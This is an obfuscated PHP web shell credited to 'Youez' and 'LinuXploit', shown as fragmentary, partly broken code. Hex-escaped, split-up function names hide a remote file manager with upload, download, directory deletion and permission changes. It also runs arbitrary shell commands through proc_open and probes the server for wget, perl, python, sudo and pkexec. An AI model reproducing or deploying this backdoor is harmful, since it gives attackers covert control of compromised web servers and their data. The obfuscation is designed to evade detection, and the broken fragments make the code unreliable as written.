\x23\x66\x66\x66\x66\x66f\x3b\n}\n\n.\x75\x70\x20{\n\t\x62\x61c\x6bg\x72o\x75\x6ed-c\x6fl\x6fr:\x20\x74ra\x6e\x73par\x65n\x74;\n\tc\x6flor:\x20#f\x66f;\n}\n\nopti\x6f\x6e {\n\t\x62\x61\x63\x6b\x67\x72\x6fun\x64-\x63\x6f\x6c\x6fr: #\x31\x66\x31f\x31\x66\x3b\n}\n\n\x2eb\x74f\x20{\n\t\x62\x61ck\x67roun\x64:\x20\x74r\x61\x6esp\x61r\x65nt\x3b\n\tbo\x72d\x65\x72:\x201\x70\x78 #\x66ff \x73\x6flid;\n\t\x63ur\x73o\x72:\x20\x70\x6fi\x6ete\x72;\n}\n\n::-\x77e\x62ki\x74-f\x69\x6ce-uplo\x61\x64-bu\x74t\x6fn\x20{\n\x20 \x62a\x63\x6bg\x72o\x75\x6ed:\x20\x74\x72ans\x70\x61r\x65\x6et\x3b\n\x20 col\x6f\x72:\x20#f\x66\x66;\n  bord\x65r-\x63\x6fl\x6fr:\x20#\x66f\x66;\n  \x63u\x72\x73\x6f\x72:\x20\x70\x6f\x69nter;\n}\n\x3c/s\x74\x79l\x65>\n<\x63e\x6eter\x3e\n";
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["\x78\x72k\x6aq\x73\x77l\x6cd\x6a"] = "\x66n\x63t";
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$ {
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$lxwfnbvxbkvb = "\x6b\x65\x79";
$ {
["n\x77k\x6bhw"] = "\x66x\x74";
$ {
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$ {
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$ {
["w\x63\x69\x69\x75\x7ao\x63w\x74\x6f"] = "ocd";
$ {
} = "\x66i"."l\x65\x5fp"."u\x74_\x63\x6f"."\x6e\x74e"."\x6ets";
$ {
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$ {
} = "\x73"."trip"."\x73las\x68"."\x65s";
$ {
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} = "\x73\x63"."\x61"."\x6e\x64"."ir";
$ {
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} = "fi"."le\x5f"."exi\x73"."t\x73";
$ {
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} = "i"."\x73\x5f\x64"."\x69r";
$ {
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$wxmddzbvxn = "\x65\x75\x79\x62r\x65\x6b\x77";
$edfwdxlirj = "\x69\x72d";
$ {
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} = "i"."\x73\x5ff\x69"."\x6ce";
$ {
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} = "\x73\x75bs"."tr";
$ljzqypxykt = "r\x70\x74";
$ {
} = "\x73p"."\x72i"."\x6e\x74f";
$ {
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} = "\x66i\x6c"."\x65\x70e"."\x72\x6d\x73";
$ {
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} = "ch"."m"."\x6f\x64";
$ {
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} = "\x6fc"."\x74\x64"."ec";
$ {
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} = "\x69"."\x73\x5f\x77\x72"."\x69\x74\x61b"."\x6c\x65";
$ {
} = "i"."s\x5fd"."i\x72";
$ {
} = "is"."\x5f\x72\x65\x61"."d\x61"."b\x6ce";
$ {
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} = "i\x73\x5f"."re"."\x61\x64a\x62"."\x6c\x65";
$ {
["q\x6d\x77\x6e\x71f\x62\x6e\x6cd"] = "s\x70s";
$ {
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} = "\x66\x69"."le\x73\x69"."\x7ae";
$ {
["\x70\x6f\x68\x76\x77d\x66\x6bb\x69"] = "\x65\x75\x79\x62\x72\x65\x6b\x77";
$ {
["\x66\x75\x6a\x77\x6fr\x6d\x63"] = "\x75\x6e\x6d";
$ {
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} = "r"."\x6f\x75"."nd";
$ {
} = "\x69n"."i\x5fg"."\x65\x74";
$ {
["\x64e\x6b\x74\x79\x6a\x73\x78\x70\x6a"] = "\x6co\x6ba\x73\x69";
$ {
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} = "\x66u"."\x6ec"."\x74ion"."_\x65xi"."s\x74\x73";
$ {
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} = "R\x45"."M"."\x4f\x54E\x5fA\x44"."\x44\x52";
$ {
} = "\x72\x65"."\x61\x6c"."pa"."t\x68";
$pjhfvcrl = "\x69\x67\x74";
$ {
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} = "\x62\x61"."se"."n\x61"."me";
$ {
} = "\x73\x74"."\x72_\x72"."\x65\x70"."l\x61"."\x63e";
$ {
    $ {
} = "\x73t"."rp"."\x6fs";
$ {
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} = "m"."k\x64"."\x69r";
$ {
} = (isset($_SERVER["\x48"."T"."\x54P"."S"]) && $_SERVER["\x48"."T"."\x54\x50"."\x53"] === "o"."n" ? "\x68t"."\x74\x70"."s" : "h\x74"."\x74\x70")."://".$_SERVER["H\x54"."T\x50"."\x5fH"."O\x53"."T"];
$ {
    $ {
} =  @ $ {
if (empty($ {
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    } = "\x3c\x66on\x74 \x63o\x6co\x72\x3d\x27\x23d\x66\x35'\x3eN\x4fNE\x3c/font\x3e";
} else {
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    $ {
        $ {
    } = "<fo\x6e\x74\x20c\x6f\x6co\x72='\x72\x65d\x27\x3e".$ {
$jwlhpwb = "s\x63d";
function author() {
    echo "<cen\x74\x65r\x3e\x3cb\x72>Y\x6f"."u"."e\x7a -\x20\x32"."\x30\x31"."\x36 -\x20"."\x67\x69"."\x74\x68u"."b\x2ec"."om"."/\x79\x6f"."\x6e3\x7a"."u<br\x3e\x3ca\x20h\x72ef\x3d'\x68\x74\x74\x70s://\x6c\x69"."n\x75"."\x78\x70"."\x6c\x6fi"."\x74"."\x2e\x63\x6f\x6d/' ta\x72get\x3d'_\x62\x6c\x61\x6ek'>Lin"."\x75X"."\x70l"."o"."i\x74\x3c/\x61></\x63\x65\x6e\x74er\x3e";
function cekdir() {
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        $ {
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        } = $ {
            $ {
    $ {
        $ {
    } = "i"."\x73_\x77"."\x72i"."\x74\x61b"."\x6ce";
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        ($ {
        })) {
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    } else {
        return "\x3cfont c\x6flo\x72\x3d'r\x65\x64'\x3e\x57\x72itea\x62l\x65\x3c/\x66o\x6e\x74>";
function crt() {
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    $ {
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        ($_SERVER["D\x4f"."\x43\x55"."M\x45"."N\x54"."\x5fR\x4f"."OT"])) {
        return "\x3c\x66on\x74 \x63\x6f\x6c\x6fr='\x67reen'>W\x72\x69te\x61b\x6ce</f\x6f\x6e\x74\x3e";
    } else {
        return "\x3cf\x6fnt\x20\x63\x6flo\x72='r\x65\x64'>Wr\x69t\x65able</f\x6f\x6e\x74>";
function xrd($lokena) {
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    $ {
        $ {
    } = "\x73"."c\x61"."n\x64"."\x69r";
    $ {
        $ {
    } = $ {
        $ {
    ($ {
        $ {
    foreach($ {
        $ {
        as$ {
        $ {
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             === "." || $ {
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        $ {
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        } = "\x69\x73"."\x5fdi"."r";
        $ {
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        ."/".$ {
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                $ {
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                $ {
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            $ {
                $ {
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            $ {
                $ {
            ($ {
                $ {
    $ {
        $ {
    } = "\x72\x6d"."\x64i"."r";
    $ {
        $ {
    ($ {
        $ {
$ivgkjaem = "\x69\x73\x72";
function cfn($fl) {
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    } = "\x62\x61"."s\x65\x6ea"."\x6d\x65";
    $ {
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    } = "pa\x74"."\x68\x69n\x66"."o";
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    $ {
        $ {
    } = $ {
        $ {
    ($ {
        $ {
        ($ {
    if ($ {
        $ {
         == "\x7ai\x70") {
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    elseif(preg_match("/j\x70eg|\x6apg|\x70\x6eg|i\x63\x6f/\x69\x6d", $ {
            $ {
        })) {
        return "<i\x20c\x6ca\x73s\x3d\x22\x66a fa-\x66\x69le-im\x61\x67e-o\" \x73\x74\x79\x6c\x65\x3d\"\x63o\x6c\x6f\x72: \x23d6\x64\x34c\x65\">\x3c/\x69\x3e";
    elseif($ {
         == "\x74xt") {
        return "<i \x63\x6ca\x73s\x3d\x22fa\x20\x66a-f\x69le-te\x78\x74-\x6f\" \x73t\x79l\x65=\"\x63\x6f\x6c\x6fr:\x20\x23\x64\x36\x644ce\"\x3e\x3c/i\x3e";
    elseif($ {
        $ {
         == "\x70\x64\x66") {
        return "\x3ci\x20c\x6ca\x73s=\"f\x61\x20\x66a-f\x69l\x65-\x70df-\x6f\"\x20s\x74\x79\x6c\x65\x3d\"c\x6f\x6co\x72:\x20#\x646d4ce\"\x3e\x3c/\x69\x3e";
    elseif($ {
        $ {
         == "h\x74\x6dl") {
        return "\x3c\x69 cl\x61ss\x3d\"\x66a\x20\x66a-\x66i\x6c\x65-\x63o\x64\x65-\x6f\x22\x20sty\x6c\x65\x3d\x22\x63\x6flo\x72: \x23d6d4c\x65\">\x3c/\x69>";
    else {
        return "<i cla\x73\x73=\x22\x66\x61 \x66a-f\x69l\x65-o\" \x73\x74\x79\x6c\x65\x3d\x22\x63\x6f\x6co\x72:\x20#d6\x644\x63\x65\x22\x3e</\x69\x3e";
function ipsrv() {
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    $ {
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    $ {
        $ {
    } = "\x66\x75\x6e"."cti"."o\x6e\x5f"."e\x78i\x73"."\x74s";
    $ {
        $ {
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    $ {
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    if ($ {
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            $ {
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        ($_SERVER[$ {
                    $ {
    } else {
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        ($_SERVER[$ {
                    $ {
$esejzwv = "\x66\x78t";
function ggr($fl) {
    $ {
    ["\x77\x6a\x71\x6f\x62\x6fu\x79e\x61"] = "\x61";
    $ {
        $ {
    } = "fun"."c\x74i"."o\x6e\x5f"."\x65xis"."ts";
    $ {
        $ {
    } = "po"."\x73i"."x\x5fge"."\x74\x67r"."g\x69\x64";
    $ {
        $ {
    } = "fi"."le"."g\x72o"."u\x70";
    $ewugyzwit = "\x63";
    $pwgvzghdbi = "\x61";
    if ($ {
        $ {
        ($ {
            $ {
        })) {
        $zircgxd = "\x62";
        $ {
        ["\x72\x72c\x63\x66\x75w\x74\x62d"] = "c";
        if (!$ {
            $ {
            ($ {
                $ {
            })) {
            return "?";
        $edierdblfw = "\x64";
        $pmnmkgvpd = "\x64";
        $ {
        } = $ {
        ($ {
            $ {
            ($ {
                $ {
        if (empty($ {
            })) {
            $ {
            ["s\x6b\x65\x69yeb\x67\x6b\x75\x74"] = "\x66l";
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            $ {
            } = $ {
            ($ {
                $ {
            if (empty($ {
                    $ {
                })) {
                return "?";
            } else {
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                    $ {
        } else {
            return$ {
                $ {
    elseif($ {
        ($ {
        })) {
        return$ {
            $ {
        ($ {
            $ {
    else {
        return "?";
function gor($fl) {
    $pxsxcfuam = "a";
    $ {
    ["lskgslj\x67\x6e\x78h"] = "\x62";
    $llyknqknf = "a";
    $ {
    } = "f\x75n"."\x63\x74i"."\x6f\x6e_"."e\x78\x69\x73"."\x74s";
    $ {
        $ {
    } = "\x70o"."\x73"."\x69\x78\x5f"."g\x65t"."\x70wu"."\x69d";
    $sdgxkujej = "b";
    $ {
    ["\x69\x64k\x65s\x6f\x79\x75"] = "\x61";
    $ {
        $ {
    } = "fi"."le"."o"."\x77\x6e"."\x65\x72";
    if ($ {
        $ {
        ($ {
        })) {
        $lgllqimc = "\x63";
        $ {
        ["\x69\x66qql\x65\x6dt\x79"] = "\x66\x6c";
        $tiglldxvro = "b";
        $ {
        ["\x6f\x70\x6e\x74yg\x77\x64\x72p"] = "d";
        if (!$ {
            $ {
            ($ {
            })) {
            return "?";
        $ {
            $ {
        } = $ {
        ($ {
            $ {
            ($ {
                $ {
        if (empty($ {
                $ {
            })) {
            $ {
                $ {
            } = $ {
                $ {
            ($ {
                $ {
            if (empty($ {
                    $ {
                })) {
                return "?";
            } else {
                $ {
                ["\x7a\x6b\x70\x68\x76\x63\x71\x66"] = "\x65";
                return$ {
                    $ {
        } else {
            $ {
            ["i\x78\x78d\x65\x63\x71\x73on"] = "\x64";
            return$ {
                $ {
    elseif($ {
        ($ {
            $ {
        })) {
        return$ {
            $ {
        ($ {
            $ {
    else {
        return "?";
function fdt($fl) {
    $mljdpwinjve = "fl";
    $abpfooutkk = "b";
    $ {
        $ {
    } = "\x64a"."\x74e";
    $ {
    } = "f\x69l"."\x65mt"."\x69me";
    return$ {
        $ {
    ("\x46 \x64 \x59 H:\x69:\x73", $ {
        $ {
        ($ {
function dunlut($fl) {
    $ldzigmkgil = "f\x6c";
    $rybsubvedwx = "\x62";
    $pcncofqr = "\x63";
    $mhqesnsxiw = "a";
    $ {
    } = "\x66\x69\x6c"."e\x5f\x65xi"."st\x73";
    $ {
    ["\x72t\x6d\x6a\x6cw\x6dt"] = "\x64";
    $ {
    } = "\x62a"."\x73en\x61"."me";
    $ {
    ["\x75j\x62\x68\x74gm\x6f"] = "fl";
    $ {
    } = "f\x69"."\x6ce\x73"."i\x7a\x65";
    $ {
        $ {
    } = "read"."f\x69"."\x6c\x65";
    if ($ {
        $ {
        ($ {
            $ {
        }) && isset($ {
        })) {
        $fkbtmqpr = "\x66\x6c";
        $ggnojlfl = "\x62";
        header("Con\x74"."\x65\x6et-T\x79p\x65: \x61"."\x70\x70"."l\x69\x63a\x74"."\x69\x6fn/\x6fc"."\x74e\x74-s"."\x74\x72\x65\x61\x6d");
        header("C\x6fnt"."\x65n\x74-D\x69\x73"."\x70osit"."ion: a\x74"."t\x61c\x68\x6d"."ent;\x20fi"."l\x65\x6ea"."m\x65\x3d\x22".$ {
            ($ {
        header("Cac"."\x68\x65-C\x6f\x6et"."r\x6f\x6c: mus\x74"."-\x72eva\x6ci"."\x64a\x74\x65");
        $kdrltqmtpk = "\x63";
        $ {
        ["\x69e\x6c\x77\x70bq\x78"] = "\x66l";
        header("Pra"."g\x6d\x61: pub"."\x6c\x69c");
        header("\x43\x6f\x6e"."\x74en"."t-Le"."n\x67\x74\x68: ".$ {
            ($ {
                $ {
        $ {
            $ {
        ($ {
            $ {
    } else {
        return "\x46i"."\x6c\x65 N\x6ft\x20\x46"."ound \x21";
function komend($kom, $lk) {
    $ {
    ["\x76l\x78\x71\x67\x75\x75"] = "a";
    $tvktohkfryd = "k\x6f\x6d";
    $rhejmhu = "x\x78";
    $ {
        $ {
    } = "p\x72"."\x65\x67_"."m\x61\x74"."ch";
    $ {
    } = "\x32"."\x3e"."&"."\x31";
    if (!$ {
        $ {
        ("/".$ {
            $ {
            ."/i", $ {
        })) {
        $ {
        ["\x6al\x70\x71\x63g\x76\x79d\x66\x6e"] = "x\x78";
        $ {
        ["u\x63\x65\x68\x64s\x6c"] = "\x6bo\x6d";
        $ {
            $ {
        } = $ {
            $ {
        ."\x20".$ {
            $ {
    $kwbnjmxnx = "\x63";
    $ {
        $ {
    } = "\x66u"."\x6e\x63\x74\x69"."on\x5f"."\x65\x78"."\x69\x73"."t\x73";
    $ {
        $ {
    } = "\x70"."ro"."c_\x6fp"."en";
    $ {
    } = "ht\x6d"."\x6c\x73\x70\x65"."\x63i\x61\x6c\x63"."ha\x72\x73";
    $kdrkctmpbcz = "\x62";
    $ {
        $ {
    } = "\x73"."tr\x65a"."m_g"."\x65\x74_c"."o\x6e\x74"."en\x74s";
    if ($ {
        $ {
        ($ {
        })) {
        $mwhofra = "\x6c\x6b";
        $mdwmiazwh = "\x70\x73";
        $ {
        } = $ {
            $ {
        ($ {
            $ {
        }, array(0 => array("pi\x70\x65", "r"), 1 => array("pi\x70e", "w"), 2 => array("\x70i\x70\x65", "\x72")), $ {
            $ {
        }, $ {
        return "<p\x72\x65\x3e".$ {
            $ {
        ($ {
            $ {
            ($ {
                $ {
    } else {
        return "p\x72"."oc"."_op"."en \x66"."u\x6e\x63"."t\x69o"."n \x69"."s\x20\x64\x69"."\x73\x61\x62l"."\x65d !";
function green($text) {
    $oxtrdncesee = "\x74e\x78t";
    echo "<\x63\x65\x6ete\x72\x3e\x3c\x66\x6fn\x74 co\x6cor\x3d\x27\x67r\x65\x65n\x27>".$ {
function red($text) {
    $gihvirs = "t\x65\x78\x74";
    echo "<\x63ente\x72\x3e<f\x6f\x6e\x74 \x63\x6flo\x72=\x27r\x65d'\x3e".$ {
function oren($text) {
    $ {
    ["n\x70\x75\x6b\x68f"] = "t\x65xt";
    return "\x3cce\x6ete\x72\x3e<font\x20col\x6f\x72\x3d\x27o\x72\x61\x6e\x67\x65'\x3e".$ {
        $ {
function tuls($nm, $lk) {
    $oibkgetoku = "\x6c\x6b";
    $gmbgpziaxf = "nm";
    return "[ <\x61\x20\x68\x72e\x66='".$ {
    ."\x27\x3e".$ {
    ."</a> ]&\x6e\x62\x73\x70;&\x6e\x62\x73\x70;&n\x62\x73\x70\x3b\x26\x6ebs\x70\x3b\x26n\x62sp;";
echo "\x53e"."\x72\x76"."\x65\x72"." \x49"."\x50 : \x3cfo\x6et\x20\x63\x6flor=\x23\x64\x665\x3e".ipsrv()."</\x66\x6f\x6et> &\x6e\x62sp\x3b/\x26\x6e\x62sp; \x59\x6f"."\x75r\x20\x49"."\x50\x20:\x20\x3c\x66\x6fnt\x20co\x6cor\x3d\x23df\x35>".$_SERVER[$ {
        $ {
echo "\x57\x65"."\x62 S"."\x65\x72v"."er : \x3c\x66\x6f\x6et c\x6flor=\x27#\x64f\x35'\x3e".$_SERVER["SE"."RV"."\x45R_"."\x53OF"."T\x57A"."RE"]."</f\x6fnt>\x3cb\x72\x3e";
$ {
    $ {
} = "ph"."p\x5fu"."\x6ea"."m\x65";
echo "S\x79s"."\x74em\x20: <fon\x74 c\x6fl\x6fr=\x27#\x64f5\x27\x3e". @ $ {
    $ {
$ {
} = "g"."\x65t_"."c\x75\x72\x72"."\x65nt"."_us"."\x65r";
$ {
    $ {
} = "g"."et"."\x6d\x79"."\x75i"."d";
$vhyacpz = "mek\x69c\x69n\x61";
echo "U\x73"."\x65\x72\x20:\x20\x3cfon\x74\x20\x63o\x6c\x6f\x72\x3d'\x23\x64\x665\x27>". @ $ {
    $ {
()."\x26\x6ebsp\x3b\x3c/\x66o\x6e\x74>( \x3cf\x6f\x6e\x74\x20c\x6f\x6c\x6f\x72\x3d\x27\x23\x64f5'\x3e". @ $ {
    $ {
$inhjrwwivy = "\x65uy\x62\x72ek\x77";
$ {
    $ {
} = "ph"."pve"."\x72si"."\x6fn";
echo "P\x48"."\x50\x20\x56"."\x65\x72"."\x73\x69\x6f"."\x6e\x20: <\x66on\x74\x20\x63olor=\x27#\x64f\x35\x27>". @ $ {
    $ {
$croldmyrovu = "\x6c\x6f\x6b\x61\x73\x69\x73";
echo "\x44\x69\x73"."\x61bl"."e \x46\x75"."\x6e\x63\x74"."\x69o\x6e : ".$ {
    $ {
echo "\x4d\x79S\x51L\x20:\x20";
$qsnksgboo = "\x66\x78t";
if ( @ $ {
    $ {
    ("my"."\x73ql_co"."nn\x65"."ct")) {
    echo "<fon\x74 c\x6fl\x6fr\x3dgree\x6e>\x4fN</fo\x6e\x74>";
} else {
    echo "\x3c\x66o\x6e\x74\x20\x63ol\x6f\x72=r\x65d\x3e\x4f\x46\x46\x3c/\x66\x6f\x6e\x74\x3e";
echo " &\x6e\x62\x73p\x3b|\x26nb\x73\x70; \x63\x55RL :\x20";
if ( @ $ {
    $ {
    ("\x63\x75"."rl"."_\x69n"."\x69\x74")) {
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} else {
    echo "\x3c\x66ont c\x6f\x6c\x6f\x72=\x72\x65d\x3eOFF\x3c/f\x6fnt\x3e";
echo " &\x6eb\x73\x70\x3b|&nbsp; \x57G"."ET : ";
$ {
["k\x72\x6egm\x71k\x72et\x68"] = "\x65uy\x62\x72\x65\x6b\x77";
if ( @ $ {
    ("/"."u\x73"."\x72/\x62"."in/w"."g\x65t")) {
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} else {
    echo "<\x66ont c\x6f\x6cor=r\x65\x64\x3e\x4fF\x46</\x66\x6f\x6e\x74>";
echo " &\x6ebs\x70\x3b|\x26\x6e\x62sp\x3b\x20\x50\x65"."rl\x20: ";
$ {
["\x77\x69\x76\x76u\x64\x63y"] = "\x69\x64";
if ( @ $ {
    $ {
    ("/u"."\x73r/\x62"."i\x6e"."/\x70e"."rl")) {
    echo "<f\x6f\x6e\x74\x20\x63o\x6co\x72=gre\x65n\x3e\x4fN</\x66o\x6et>";
} else {
    echo "\x3cf\x6f\x6e\x74\x20co\x6co\x72=r\x65d>\x4f\x46F\x3c/\x66on\x74>";
echo " &nb\x73\x70;|\x26\x6eb\x73p\x3b\x20Pyt"."\x68\x6f"."n\x20: ";
if ( @ $ {
    $ {
    ("/"."us"."r/b"."i\x6e/p"."ytho"."n2")) {
    echo "<\x66o\x6et c\x6fl\x6fr=g\x72\x65en>ON</f\x6f\x6e\x74>";
} else {
    echo "<\x66o\x6e\x74\x20c\x6f\x6c\x6f\x72=red>O\x46F\x3c/f\x6f\x6et>";
echo "\x20\x26\x6eb\x73\x70;|\x26\x6eb\x73\x70\x3b\x20S"."u"."do : ";
$vfksjcyl = "\x65u\x79\x62\x72ekw";
if ( @ $ {
    ("/"."\x75s"."\x72/\x62"."in/s"."\x75"."\x64"."o")) {
    echo "<f\x6fn\x74 \x63\x6flo\x72=g\x72e\x65n>O\x4e\x3c/\x66\x6f\x6e\x74>";
} else {
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echo " \x26n\x62\x73p\x3b|&\x6e\x62s\x70\x3b \x50k"."e"."x"."e"."\x63\x20:\x20";
if ( @ $ {
    ("/"."u\x73"."\x72/\x62"."\x69\x6e/p"."\x6b"."e"."x"."\x65"."c")) {
    echo "<\x66\x6f\x6et co\x6c\x6f\x72\x3d\x67r\x65\x65\x6e\x3eO\x4e\x3c/f\x6fnt>";
} else {
    echo "\x3c\x66\x6fn\x74 \x63olor\x3dr\x65\x64\x3e\x4fF\x46\x3c/f\x6fn\x74\x3e";
echo "\x3c\x62r>\x44\x69"."\x72e\x63\x74"."\x6f\x72\x79\x20:\x20&\x6e\x62s\x70;";
foreach($_POST as$ {
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        $ {
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if (isset($_GET["lok\x6e\x79a"])) {
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        $ {
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} else {
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    $ {
        $ {
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        $ {
    $ {
        $ {
    } = $ {
        $ {
$ {
    $ {
} = $ {
("\x5c", "/", $ {
    $ {
$ {
} = $ {
    $ {
("/", $ {
$ {
} =  @ $ {
($ {
    $ {
foreach($ {
    $ {
    as$ {
    $ {
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}) {
    $kvtepftsol = "\x6cok";
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    $ {
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    if ($ {
         == "" && $ {
        $ {
         == 0) {
        $ilronn = "\x61";
        $ {
        } = true;
        echo "<a\x20\x68\x72\x65f=\"?l\x6f\x6b\x6e\x79\x61\x3d/\"\x3e/</\x61\x3e";
    $ykqmvxiy = "\x69";
    $nvguoeps = "\x69";
    if ($ {
        $ {
         == "")
    echo "<a\x20h\x72\x65\x66\x3d\"?\x6c\x6fknya\x3d";
    for ($ {
    } = 0; $ {
         <= $ {
        $ {
    }; $ {
        ++) {
        $dxsirqc = "\x69";
        echo "$lokasis[$i]";
        if ($ {
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            $ {
            echo "/";
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echo "</td>\x3c/tr><tr><td\x3e<b\x72>";
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                $ {
                } = $ {
                    $ {
                echo "F\x69"."l\x65 U\x70\x6c"."\x6f\x61"."d\x65\x64\x20!\x20&\x6eb\x73\x70\x3b<fo\x6e\x74 \x63\x6fl\x6f\x72\x3d\x27go\x6c\x64'\x3e\x3c\x69\x3e".$ {
                    $ {
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                    $ {
                    ["\x71\x6beyx\x6c\x72\x78\x6f\x7ad"] = "\x77\x62";
                    $ {
                    ["\x6f\x76\x78t\x75\x76\x78"] = "\x6cw\x62";
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                    $ {
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                    ($_SERVER["\x44O"."\x43U"."\x4d"."\x45\x4eT"."_\x52"."OO"."\x54"], $ {
                        $ {
                        ."/", $ {
                        $ {
                    echo "\x4c\x69"."\x6e\x6b\x20: <a href\x3d'".$ {
                        $ {
                    ."'>\x3c\x66\x6fn\x74\x20\x63\x6fl\x6fr=\x27\x23df5\x27\x3e".$ {
                        $ {
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echo "\x55plo"."ad\x20\x46i"."le :\x20";
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                echo "\x3c\x69\x6e\x70\x75\x74 \x74yp\x65\x3d\"h\x69\x64\x64\x65n\x22\x20na\x6d\x65=\"\x6co\x6bny\x61\" \x76\x61lu\x65\x3d\x22".$_POST["\x6co\x6bn\x79a"]."\x22>\n\x20   \x20\x20    \x20  \x20\x20 <\x69n\x70ut t\x79\x70\x65\x3d\"hi\x64\x64e\x6e\x22\x20name=\x22\x70\x69\x6c\x69\x68\" \x76al\x75e\x3d\"f\x6f\x6cder\x22>\x3c/\x66\x6f\x72\x6d\x3e";
        } else {
            echo "<f\x6f\x72m\x20\x6de\x74\x68\x6fd\x3d\"p\x6fs\x74\x22><\x63\x65\x6e\x74\x65r\x3e\x46\x6f\x6c\x64er : <inp\x75\x74\x20\x74\x79\x70\x65\x3d\"t\x65\x78\x74\" n\x61me\x3d\x22\x66o"."lde"."\x72b\x61"."ru\x22\x20c\x6c\x61\x73\x73\x3d\x22\x75\x70\x22\x3e \x3cin\x70\x75t\x20\x74\x79p\x65\x3d\"\x73ubm\x69t\" n\x61me=\"\x62\x75atfol\x64er\x22\x20\x76a\x6cue=\x22\x43\x72e\x61t\x65\x20\x66\x6f\x6c\x64er\x22\x20\x63las\x73=\x22up\" style\x3d\"\x63ursor: po\x69\x6ete\x72;\x20\x62o\x72der-col\x6fr: #f\x66\x66\x22\x3e<\x62r><b\x72></c\x65\x6e\x74\x65\x72>";
            echo "<\x69\x6e\x70u\x74\x20\x74\x79\x70e=\x22\x68idd\x65\x6e\"\x20n\x61\x6d\x65=\x22\x6cok\x6ey\x61\"\x20\x76\x61l\x75e=\"".$_POST["\x6cokn\x79a"]."\"\x3e<i\x6ep\x75t\x20\x74yp\x65\x3d\"hi\x64\x64e\x6e\x22\x20n\x61me=\x22p\x69l\x69\x68\x22\x20value=\x22\x66o\x6cd\x65r\x22\x3e</\x66\x6f\x72\x6d\x3e";
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        $ {
        ("\x2e/") || $ {
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        ("\x2e/")) {
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                echo "\x3c\x69\x6epu\x74 \x74ype\x3d\"\x68idd\x65n\" \x6eam\x65=\x22\x6co\x6b\x6eya\"\x20\x76\x61\x6cu\x65=\"".$_POST["l\x6f\x6b"."nya"]."\"\x3e\n\x20  \x20 \x20  \x20  \x20 \x20  <\x69\x6epu\x74 \x74\x79\x70e\x3d\"hi\x64\x64\x65n\"\x20\x6ea\x6de\x3d\"pi\x6ci\x68\x22\x20\x76\x61\x6c\x75e=\"\x66i"."\x6c\x65\x22></for\x6d\x3e";
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                echo "<in\x70ut\x20\x74ype=\"h\x69\x64d\x65n\"\x20n\x61\x6de=\x22l\x6f\x6bnya\x22\x20valu\x65=\"".$_POST["\x6cok"."ny\x61"]."\"\x3e\n\x20\x20  \x20 \x20\x20 \x20   \x20 \x20\x3cinput\x20t\x79\x70\x65\x3d\x22\x68i\x64d\x65\x6e\x22\x20\x6eame=\"\x70ilih\" va\x6c\x75\x65=\"f\x69"."le\x22></form\x3e";
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            echo "\x3c\x69np\x75\x74\x20\x74\x79\x70\x65=\"\x68\x69\x64\x64en\" \x6e\x61me\x3d\"lo\x6b\x6eya\"\x20va\x6cue\x3d\x22".$_POST["\x6co\x6b"."\x6e\x79\x61"]."\x22\x3e<\x69n\x70\x75\x74\x20\x74yp\x65=\"\x68\x69\x64\x64en\" \x6eam\x65=\"pi\x6c\x69\x68\x22 \x76al\x75\x65\x3d\"\x66\x69"."\x6c\x65\"></\x66\x6frm\x3e";
echo "\x3cd\x69\x76 i\x64\x3d\"c\x6f\x6et\x65nt\x22\x3e<ta\x62l\x65 w\x69dt\x68\x3d\x2210\x30%\" \x62orde\x72=\x220\x22\x20c\x65ll\x70\x61\x64di\x6e\x67\x3d\"\x33\x22 \x63el\x6cs\x70a\x63\x69ng=\x22\x31\x22\x20\x61l\x69\x67n\x3d\x22\x63\x65nte\x72\"\x3e\n\x3c\x74\x72 c\x6c\x61\x73s=\x22\x66irs\x74\">\n<t\x64\x3e<\x63ent\x65\x72\x3eN\x61"."m\x65</c\x65nt\x65\x72\x3e\x3c/\x74\x64>\n<t\x64>\x3c\x63\x65nte\x72>Si"."\x7a\x65</\x63en\x74e\x72>\x3c/\x74d>\n<\x74d><c\x65n\x74\x65r>L\x61\x73"."t M\x6f"."\x64\x69f"."ied</c\x65\x6et\x65\x72\x3e</td>\n\x3c\x74\x64\x3e\x3c\x63\x65\x6e\x74e\x72>\x4f\x77\x6e\x65\x72\x20/\x20G\x72\x6fu\x70\x3c/\x63e\x6et\x65\x72></\x74\x64>\n<\x74\x64\x3e\x3c\x63\x65\x6et\x65\x72\x3ePe"."\x72mi"."\x73\x73"."\x69\x6fn\x73\x3c/\x63e\x6e\x74\x65r></td\x3e\n\x3c\x74d>\x3cc\x65\x6e\x74\x65r\x3eOp"."t\x69o"."n\x73</\x63e\x6et\x65r\x3e\x3c/t\x64\x3e\n\x3c/\x74r\x3e";
echo "<tr>";
$ {
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} = $ {
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$ {
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} = $ {
("//", "/", $ {
echo "\x3ct\x64><\x69\x20\x63\x6c\x61\x73\x73\x3d'\x66a\x20\x66\x61-fo\x6c\x64\x65\x72' st\x79\x6c\x65=\x27col\x6fr:\x20\x23ff\x659a\x32'\x3e</\x69\x3e\x20<a h\x72\x65f\x3d\x22?l\x6f\x6bny\x61=".$ {
    $ {
."\x22\x3e\x2e.\x3c/\x61>\x3c/\x74d>\n<\x74d>\x3cce\x6et\x65\x72\x3e--</\x63\x65nt\x65r\x3e\x3c/\x74\x64\x3e\n<\x74\x64>\x3cc\x65n\x74\x65r>".fdt($ {
    $ {
})."</c\x65n\x74\x65\x72\x3e</\x74\x64\x3e\n<t\x64\x3e<c\x65\x6et\x65\x72>".gor($ {
})." / ".ggr($ {
    $ {
if ($ {
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    ($ {
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if ($ {
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    echo "</\x66\x6f\x6e\x74\x3e";
